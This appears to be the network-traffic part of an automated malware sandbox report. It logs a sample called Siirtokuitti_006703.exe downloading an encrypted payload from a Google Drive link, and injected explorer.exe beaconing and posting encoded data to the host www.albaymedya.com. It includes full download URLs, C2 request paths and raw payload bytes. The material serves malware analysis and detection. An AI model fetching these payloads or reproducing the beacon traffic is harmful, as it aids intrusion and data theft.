4e 66 61 67 54 35 31 44 4c 34 70 4b 54 6c 79 6e 32 51 36 57 4b 45 37 50 46 35 47 4f 30 71 65 4d 39 70 56 43 42 7e 33 68 6a 73 75 73 77 74 37 52 64 7e 70 59 35 66 7a 36
                                                                                                                    Data Ascii: O0qEM=uSr6FpeGbsTYRhPc7ciaOD9PJYAKbV7A9SpFPMcSuro1hWvD0KjPrEKZC1MojYtC~lTm81boeScAVgfI~KPpFT(UifgCuJF11VGLBmYHoBNAGpC1pzSKZ7XdZ2IUCMSC(5pDAlH99go53MAYZqzdEurl1EM0~pfiknuXIDJ_02DvVB3cE4wefRSJ6OpM8Tm_xDMDf9AYprKJPg1KUIWPyzbYLyQc9aZm5G3499W0WdZ3ISGg2qGU3Ag-9ca7fCc5~iLVh_Qd917-OcFcvqh5IvAotLyuZbfHuyftwM55XQhlUZekMwdhgu(lw5pOMAu40nhooJT2~NDWGd5u45LngSFqhbmGzOM0jEsIv-kY7A5mNdyKYrGi6GMqO4JFR2CDx8xFC5CImRCgv-7vbieRcY5qq3tdFyZYJUT0TXTdhmLsuUcrCZ2aBCewYJ3b3RT2vodsHb4jj66EZTafvg1k1WhLminfd7gSYIUOp3vEMEavjmoDS0wW9EHUoI3Vbu8AJHnCQGP0PsnswAMJsJlWxXGLWNXCLPrX(dXHE9fpf0ku7K1AgEfkqge1BAWkzjKIamVfxlTF4GHZxRKSld(xC9adaE3JNqV9ULTgVCQ1oP2zUrTFLgMX~dmf(1fp23AlPUBLiphxQ7nl9L(J46bm7J96TG36L8ARiacO55Qhu20B~1LgNZBp4K73K1wRuxNI2SiosvXcnotF1jSGkTYf(MnnXV81ehAue75IislIigGWp0mbbXp6RxKTUOiTnRicRMpFz4x7vk34lOOyWChDfL8JlKHPQh2CrYaqG60YLvt1(j4EfHmI5LwwRuFDocqUecPb~zlM4p1rTIgtmOqvsoROHKClxXFC~lureSKB(agMGeQH~D9Zs-B4UECRmYUwOJ2D9Ude0due95v5ewMz7Rkhz4RtD4JJorWdJ7(9CyfPDNM3H3GNmHs5YpOJInz2rX2_LnVRmmNscCsHClge9rRrZDeqkUgtQGY5R5kZAL1s0T4k~Ivwo_0RKVYouRaNaa5jOmem2ef_HABRBZHfGnChC1bVlH41EyPgnN9E9Qb9ddMy83eZlu2u7IA6v-EDviDK5KKKwVAMyboG4riKnJW91TClhZwV(VHeWHrw0rO634V3L7VwT58yOV0YVZ9VdDPLVYpydOf4WA54s6EgZRpMb-i2TQ459hwr0-0co5wMXWeb0iZJl7Mjvs(QsrqTLx1SVcfa2MoygWS3dMgWw76KQy4aEW4bo7D0zSaH7QtY8ZjyQBcx3DqaQrZrr4u27bXog0A60w4b7yMsSyHQLNfagT51DL4pKTlyn2Q6WKE7PF5GO0qeM9pVCB~3hjsuswt7Rd~pY5fz6oJie_7uyQvhJk4a6iLKK7FopslN5iofux3B9GVGK7VBROQV3xgWLtM_QWajynU5BWkIkfX3q-LTCkTENA8I9eUs0BS6IUQqSFg_lTodzmH9kdnSEEeXuAAON79mRRIpTs8PVFdTV2bmU74QmcRoaLNIo77ODOXfypD9PaOsT_7EE4Oayx2l5FRWlWjmKeaoVLpGfzJUaMd7YMxF~SO0z2jaljo2Mb2HOeFQ38isJXCMnKPgouI7PJUzykEytNoGg4cfu015yYJYfMHiV4i00VS4opUfutgdz40WNQ9jlVeqlMZ83RCQoSKxPXMISi7vplxP7m07MYvBFuXzhLFM8GYK5a1X0odzY1JPfPzX(8I68Iey4oCNbmgfFDWKs_~Munn2zMIy52kUCNNUdBLT47MeWgbnkGTwiDZiHAgD5nUBVpgF1V2kslmkiVxheVrS4WPrPG0VUJlZbxeb0_5Lt22i4jE-eLkrvQwuH8EWmviYaY1IkzHiUgGCnUdutuNu0r8Iznt95USI5j3Bmwd3LPxf~raSnAtK(_8KTeXOZMIEXi40yKsoLIJ1McmRM3e06RptlwLXSFQ9LdlMrG52kWpASQcrRYwWjyquJQw_a7VQgmgwg5gRmWaDNKNNMa730aW1o1a69vwhWo8Dn4vhyGj4WzNJn-SX3Qf0iX(a(Pjv5HnMcqOLEB3qzkA8Y9883vrGfro7zi8L80GOTgf0Mu~VK_FewmeKL6kwo1x-fiMETWLdkakT8jDVMRihc2IyJF87GS54btVEqb2ShNmFn73ibcY1Zyt506Ak6169cqAgNcktjypkr_pqCbz8ZrrKOzr45Yne3LpCBlVMTAwnEt4lbQg_MCaTnZhuh6Ro046tPcxa(cwUM1uK6do5gEU2NsNn9kOaNqjpW23g60wVBO5FujRAQQ01Bt7WKZwkhTD3kUSmWMYgtvZlGR(B(tlhwyVYnDh-RgrMdblzfn7QDp97vWJFp94JNv43W4pjL6BRwa~VkqOzToe8ETvyns0Jen4TQ36lH6dnBYH3pNB11v~GNH24iUV0gVBh4Vg8JsFd1y2NISnt75DUNnxE2Czk8JvCqeNNiZ1S0w2ztaaEXBDWAFCfCmGfXlQO02ELLNGY6TT5L_PDiv6I6r8OHHaM0lauU9eLKXO0Wq8l~u8mnPnRixGXLwMxhYcfZC4KAyhp1hmYIWzB2FtWMX45XBgCTphrJIIaKzi1ByAVKIPVOkXlIOlk1e5eASmzjpkLTCbE2jBJlPb9Jp4qDvdndAz6lCQHiBE1NBMbsgHGcsvuShlNXMdn5W~5VaU6eZQj3L9r~JC6(qJiy2qqvjsGJ5fmkeC85iMbNYdLUdgwAlK1yO63vX~UZzEYIzCfxHRov8efUI(jQl0IPFBI3s9XpQR1OUvTk3ZOo5xts1j12xK-Nw7K8adCAh7u8cotZMGvAy~Fuo8KHBgYRg5tjD3lMxgRAhJpoZY9a7e8cBx9A5KzVfLH~Ws6BJHzylXtFsgv~bgEOuKdjaLU0g0DO8R5zlaVCoz0~1b8iMcSPKEMP96rYKAk1wrd87RK(8tU0MpUyqjru4AF~xAEbQSr2gwRWbjOIjgfWQf3e3h-~hY6boKpHDyrbjWHhD5Q~2Dh1PTVHJVxhOAPHQs6Z2Ejynp7mlZMwx3cKInVOUNi2ORsUsQNUNU2i8luirQ2BYhljhQYzF67JY0f~SfZufjRen1-rm4DkItUE-XgPu5LegqnoCOIj9zlf3g9ISwQZZxh3WS80uE1imfjtriRUcCqt6mDUOvL~R8B1CFwHETan6KLJnkrTQtVJGTNT7hqa56UqBcHdJsD(U939wW113NmKIbMVJrFzNS9Iv4B9Otg7JzptgT9CZtZVQ1w6opix8keYAT3BTQFPvqhwNMU~ViXFrccUesaL-dTEgWKZSqMN3MlJ_hgSQrp9ss_NHBqUtq2k7i7V2dqjGeRTx7CfdwKmajT1XkScr(YyJoJo7XSkyyg2E2OTkv9O3zBAUVxou0TJtuuemDSgBaHUJZexacLUs~EOVfs5zQQVpCgXLPw3Vp7u-EHqxS59OYoC5btc0X_s2v8hjfCAO1J
                                                                                                                    May 30, 2023 11:13:29.791605949 CEST1780OUTData Raw: 4e 7a 37 56 31 49 52 41 4e 39 5a 45 39 6b 35 49 53 5a 74 51 57 37 6f 63 30 72 45 70 69 42 73 71 4e 64 63 62 44 71 6b 51 51 6c 45 46 34 37 42 6b 35 6f 67 74 28 6f 66 42 58 30 55 42 58 54 58 77 71 65 72 34 4c 70 41 6d 58 77 6c 69 7e 4f 30 32 49 62
                                                                                                                    Data Ascii: Nz7V1IRAN9ZE9k5ISZtQW7oc0rEpiBsqNdcbDqkQQlEF47Bk5ogt(ofBX0UBXTXwqer4LpAmXwli~O02IbBI5IWjkSsrzC4tR-YLDNrGPh81USJUckGdOPvigcw9mJDGbgETUd(L75k9qvZHyT(aH8KzA9iBhusA~4XVvwlMI_nlYDmWlPcJ6vBNp4mCheB227Sa(HjCmp9lAOwx0uTuJJAI(153Gjdf4PYb4eK6x5l0WFDLVsL
                                                                                                                    May 30, 2023 11:13:29.838769913 CEST1791OUTData Raw: 31 6b 47 31 32 43 72 6c 38 4c 68 78 50 4f 75 53 4e 32 6a 38 41 30 77 65 6f 34 42 5a 6a 4a 72 79 35 76 37 69 70 7a 73 65 45 71 5a 4e 6f 37 4d 66 54 46 4b 4b 7e 68 28 4c 66 73 47 50 6c 4a 35 30 35 44 57 58 46 79 59 5a 54 4d 71 39 34 72 6f 72 6a 70
                                                                                                                    Data Ascii: 1kG12Crl8LhxPOuSN2j8A0weo4BZjJry5v7ipzseEqZNo7MfTFKK~h(LfsGPlJ505DWXFyYZTMq94rorjpacjJqQW-ak3rsmY4DGc6SR(vsf5j8OE-AeeIJaTFALHVeXaoolP6AhEKzfJZt0U2lQ44THiOTlYa0vxW4vI3MEDaWmdPv-RicfwYJtOIyHAFNosUbXynZqfygOs0c9mhinXz8mqnQpmQ385WCEBqOMV0HayFcrv62
                                                                                                                    May 30, 2023 11:13:29.838898897 CEST1795OUTData Raw: 48 67 72 74 6b 67 72 52 52 6e 66 67 6f 4e 57 6e 76 34 63 76 4a 30 52 72 74 51 6b 68 59 76 4e 72 51 31 32 7a 38 49 73 39 68 35 64 50 46 31 5a 31 33 66 56 5f 5a 53 4e 53 74 6b 56 78 38 63 62 67 6d 43 6b 65 46 6f 6f 6c 74 49 48 52 39 42 63 31 75 4a
                                                                                                                    Data Ascii: HgrtkgrRRnfgoNWnv4cvJ0RrtQkhYvNrQ12z8Is9h5dPF1Z13fV_ZSNStkVx8cbgmCkeFooltIHR9Bc1uJlkxN3GQFppSwYqR6NP1tuDZrf0RAF7fn1BEkWb3zi9X1YX5CvliHC2Di~l9NHn96ZTTomNO4g_8Mf5cMhtIsgWX6kZkvZ7uQ9RJDT5SeD05IPzjd~MUzH51memauUK4L7Evd2k~Z1D0p~rdd6HMVmeQNSX5MoqcrM
                                                                                                                    May 30, 2023 11:13:29.838962078 CEST1797OUTData Raw: 48 70 6e 4c 76 48 6a 71 61 71 69 52 4e 63 71 69 44 73 66 5f 63 66 58 67 52 35 74 53 73 43 4d 75 61 30 46 6c 49 58 79 6b 62 76 55 5a 62 37 4c 6f 59 62 4c 76 4d 39 35 5a 52 55 59 49 4c 57 4e 51 71 77 32 73 6c 63 43 71 70 62 34 34 32 72 28 41 72 37
                                                                                                                    Data Ascii: HpnLvHjqaqiRNcqiDsf_cfXgR5tSsCMua0FlIXykbvUZb7LoYbLvM95ZRUYILWNQqw2slcCqpb442r(Ar7qGvSaTYM6g9QNh0QGHCsbRU2z-TZU3MaL823G-eXCEaTL5jtlnEk9FVyCLmA7yC3XPRBNaK3nPcvMOf6CMeHvAaNlH22UxBsYs1g9PftZs7_NKJ8XNptwIXspseNUS~TfRyoFUu1v1SSNLBbAjsj069UvubCKq1T7
                                                                                                                    May 30, 2023 11:13:29.839102030 CEST1798INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Tue, 30 May 2023 09:13:29 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 146
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                                                                                                    May 30, 2023 11:13:29.839129925 CEST1804OUTData Raw: 49 31 74 4d 54 69 32 38 4d 62 79 46 49 59 62 54 72 36 30 39 5a 35 44 47 4e 31 43 73 4f 50 6b 56 28 69 38 53 59 44 4e 45 39 77 7e 57 59 4e 31 69 71 2d 71 67 6c 72 6a 78 48 37 31 37 44 37 54 5f 4a 6b 6e 42 33 36 77 32 65 4f 64 4b 59 6b 73 64 4f 32
                                                                                                                    Data Ascii: I1tMTi28MbyFIYbTr609Z5DGN1CsOPkV(i8SYDNE9w~WYN1iq-qglrjxH717D7T_JknB36w2eOdKYksdO2UAO8RiNBGD4k5gmx4QlXkgCwfDrukRRtOVIUdaj_M1iH5ujCw_4a1H(RyO4vjCxHUzopb9jweKKyCuz657jBJzlnV5o-eJYFlQ0kU47MIVUJjjBSNZv9HW0_mqsTG4E4rI8yBESpKMoDGk8Q1Ga_CqP0trAZrUQje
                                                                                                                    May 30, 2023 11:13:29.839303017 CEST1807OUTData Raw: 45 79 56 41 50 32 4b 5a 72 2d 77 79 4c 4a 42 54 47 43 77 55 77 43 69 6f 75 41 57 43 70 30 65 5f 46 41 67 45 68 69 72 39 36 6a 76 35 6c 65 57 4f 4c 69 75 6d 65 74 58 43 43 4f 73 2d 30 5f 78 56 6d 7a 4a 51 43 68 76 4c 58 57 66 75 4d 50 42 30 52 75
                                                                                                                    Data Ascii: EyVAP2KZr-wyLJBTGCwUwCiouAWCp0e_FAgEhir96jv5leWOLiumetXCCOs-0_xVmzJQChvLXWfuMPB0RuczWmZJdk~JsQQcaWt2bCPemPWQpBG0E2RA(SfU9o8wYvg34neWlJENiCGyiWHTKcSirDxkKwYl86DT6Yi-TlixQbIErrw6fXW-RhXU4Vjeu1Wye8pfZr4zD8acpBYhXLCxi3y0tcDE43kvepKhWf7-1AonDqc88dU
                                                                                                                    May 30, 2023 11:13:29.885860920 CEST1812OUTData Raw: 78 4b 6a 4a 28 4f 42 49 34 56 54 4c 4d 48 6e 75 6d 68 48 32 61 37 48 4a 41 68 76 64 31 37 55 43 71 6e 31 62 54 73 62 4a 42 37 44 5f 41 72 6e 39 59 79 57 2d 63 31 63 35 4b 37 74 75 48 75 4a 75 6d 6d 54 4e 44 33 7e 38 47 67 31 30 47 51 6b 57 6c 5f
                                                                                                                    Data Ascii: xKjJ(OBI4VTLMHnumhH2a7HJAhvd17UCqn1bTsbJB7D_Arn9YyW-c1c5K7tuHuJummTND3~8Gg10GQkWl_VMlm6azSZDy2GxcYp9ro8poxASLvcN7ZvHCYOEKQTjia5rv76HVBY1OJbL~XB3bEntt8DSwyEGKCChx7e-aI~t~zCso9acXyMkfZJMuaCYA8JGzH9h4KpcgFHoxSsGN36j4c6_CcUAnhamExePNN4UzfgsrGGFl5v
                                                                                                                    May 30, 2023 11:13:29.885937929 CEST1817OUTData Raw: 76 6d 73 30 47 62 71 75 78 66 30 50 75 37 38 38 68 78 4e 32 4b 6d 5a 45 33 49 78 70 61 31 52 37 79 30 41 70 6f 74 63 4c 6c 4d 35 6e 47 31 51 7a 73 62 28 7a 4f 4a 41 58 66 4c 39 52 32 78 4b 74 65 38 48 46 59 63 7a 43 46 57 66 65 32 39 46 77 64 31
                                                                                                                    Data Ascii: vms0Gbquxf0Pu788hxN2KmZE3Ixpa1R7y0ApotcLlM5nG1Qzsb(zOJAXfL9R2xKte8HFYczCFWfe29Fwd12t1BBm0RoUVZZ_Uv01eXeKEzCNj67Sb9Z2YxbzGo5pxEienM85I9YpWKlCb5vVyZDnoDYugA9mZEo5uiiMRb3O(EP6HbaLyzl-AXQSU8ytd_mxhj5YD7wsBbvPj8YjwwcbkhNW14GKwBdvgDN1~0yBI-NONUhozig
                                                                                                                    May 30, 2023 11:13:29.886493921 CEST1820OUTData Raw: 49 4c 56 6c 76 65 36 79 44 79 58 76 30 33 69 43 70 6e 38 4a 4a 6a 74 64 65 71 43 78 54 51 65 53 59 59 59 6e 47 62 76 78 72 31 59 36 33 4f 74 73 45 34 58 79 42 43 36 45 30 77 28 70 77 37 6e 5a 69 48 49 33 48 57 39 33 73 33 44 58 4a 64 74 77 68 56
                                                                                                                    Data Ascii: ILVlve6yDyXv03iCpn8JJjtdeqCxTQeSYYYnGbvxr1Y63OtsE4XyBC6E0w(pw7nZiHI3HW93s3DXJdtwhV(5PIXEjWt-XNYjGLAXxJzrMkrS~mAGuVhnz4fy1yQLE2auoQ7J3MXyw3GRO76vu1h7vpUIhZlf2iXF1Z9tqxursNyZsjv-sDlTGGAkALlqdAErBMiRm2Jw6Cy92DD3wSH40NmSq_WpRFZcidzaNUWWu3eCJxCmDvQ
                                                                                                                    May 30, 2023 11:13:29.886697054 CEST1821OUTData Raw: 68 79 69 4d 4b 71 54 69 51 43 4a 4a 39 57 70 65 6d 49 41 4a 47 79 68 75 63 61 67 33 70 57 6f 6c 62 4d 71 6c 59 4f 6e 31 41 6f 30 6e 78 56 68 54 71 58 62 5f 53 44 58 73 43 55 43 44 54 73 39 34 6e 63 74 4c 59 35 35 44 47 4a 67 6c 53 37 75 50 42 66
                                                                                                                    Data Ascii: hyiMKqTiQCJJ9WpemIAJGyhucag3pWolbMqlYOn1Ao0nxVhTqXb_SDXsCUCDTs94nctLY55DGJglS7uPBf~RoUwsF4uUC60NVPK3J-I-tbn-igC2svwy7avJhzPD5kyNMX3oQGy8ElQVrFXYHY1Q5_DuoOt1SvMqS5tyOxO6iLYZ67FLt8rvbkUlC-h-Ix6OAv(TPqUTrNVQsvtMA0rFVt8ZUWko1B0rMu1WYT(7V1j1tiunl64


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    99192.168.11.2049858185.106.208.380C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:13:32.368611097 CEST1821OUTGET /tchg/?O0qEM=jQDaGZ2OScTGFSP10uKTPyhqI710WSvw2gViBbUugbcSlWDCi533rl6vPGA30o5eyDb36C/pQ3h7az/b16KQNynftoBCqLFM3A==&CF1Ki=UnDuQcdCFs1MNsvY HTTP/1.1
                                                                                                                    Host: www.albaymedya.com
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                    Data Ascii:
                                                                                                                    May 30, 2023 11:13:32.415574074 CEST1822INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Tue, 30 May 2023 09:13:31 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 146
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    0192.168.11.2049759172.217.18.110443C:\Users\user\Desktop\Siirtokuitti_006703.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    2023-05-30 09:06:51 UTC0OUTGET /uc?export=download&id=1gvJNG_hcxbVMWQvESL5VmHgfKw3TSb3S HTTP/1.1
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0
                                                                                                                    Host: drive.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2023-05-30 09:06:51 UTC0INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Tue, 30 May 2023 09:06:51 GMT
                                                                                                                    Location: https://doc-04-7k-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/k5vv2eer5piasl85vm2gu1ubr744dkes/1685437575000/04063919605701821530/*/1gvJNG_hcxbVMWQvESL5VmHgfKw3TSb3S?e=download&uuid=0165319d-d6ed-4364-9b74-a19685a5f726
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'nonce-ADOReUV0lxNy5LZ2TDS1ew' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    1192.168.11.2049760142.250.186.97443C:\Users\user\Desktop\Siirtokuitti_006703.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    2023-05-30 09:06:51 UTC1OUTGET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/k5vv2eer5piasl85vm2gu1ubr744dkes/1685437575000/04063919605701821530/*/1gvJNG_hcxbVMWQvESL5VmHgfKw3TSb3S?e=download&uuid=0165319d-d6ed-4364-9b74-a19685a5f726 HTTP/1.1
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: doc-04-7k-docs.googleusercontent.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    2023-05-30 09:06:51 UTC2INHTTP/1.1 200 OK
                                                                                                                    X-GUploader-UploadID: ADPycdvP8N0QmxhPP9DsUsFn1njJnOKlTWIBcXfOSQ4CR8oCXhS5Fk5H8QG6zBYpmOJ-Sb6uDUrf1QBTRxyTGOZ6vVW8jMfQBsek
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Content-Disposition: attachment; filename="SsOXCiefhu202.bin"; filename*=UTF-8''SsOXCiefhu202.bin
                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                    Access-Control-Allow-Credentials: false
                                                                                                                    Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-328800237-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context
                                                                                                                    Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                                    Content-Length: 191040
                                                                                                                    Date: Tue, 30 May 2023 09:06:51 GMT
                                                                                                                    Expires: Tue, 30 May 2023 09:06:51 GMT
                                                                                                                    Cache-Control: private, max-age=0
                                                                                                                    X-Goog-Hash: crc32c=gTeD2Q==
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close
                                                                                                                    2023-05-30 09:06:51 UTC6INData Raw: 4d d7 6d 42 c5 ce 8c 97 9e 25 22 ba 85 10 e9 f0 72 3b ca 56 14 32 9c 05 40 29 14 91 8c b8 a5 af e3 6e b7 5d a8 9f b2 29 c1 ea 8a 58 ce eb c4 4f 37 a8 e3 d7 c1 19 c7 48 b6 c7 e1 43 62 a5 03 b2 45 05 89 34 25 7f c6 f3 76 f5 66 2f eb 1f 05 be 7e 10 2a 09 54 02 2f 11 d8 44 0d 88 b6 4e 6b ef 4e cc 3a c9 39 e1 13 61 37 aa 31 6f 2b 1d f4 7f 62 11 a2 96 9a bf b8 e1 20 7d 6e 12 f7 bb 55 85 cc e0 0d 04 b2 5c 74 6d 8f 91 6e 55 0a 25 92 d2 c0 91 d9 ca 8f dd ae 35 f4 ec 5f e3 c1 81 9a a4 37 26 49 b4 d8 fc 87 15 9a 10 51 f8 eb 77 f9 95 54 cc 62 c8 ee 71 86 50 93 1c 24 d9 c2 b5 62 b4 d3 96 b8 bd 1e bf 05 ae d3 c9 e1 69 fc d0 bb 33 ca fb ec a6 1c 6d a6 c1 5a 09 fa ac 0e 89 98 89 63 21 cc ea 75 16 91 e2 9a 43 d9 64 be e3 86 1e 01 3d 44 e5 49 46 6b e9 e7 a2 6c 4c 75 76 fc
                                                                                                                    Data Ascii: MmB%"r;V2@)n])XO7HCbE4%vf/~*T/DNkN:9a71o+b }nU\tmnU%5_7&IQwTbqP$bi3mZc!uCd=DIFklLuv
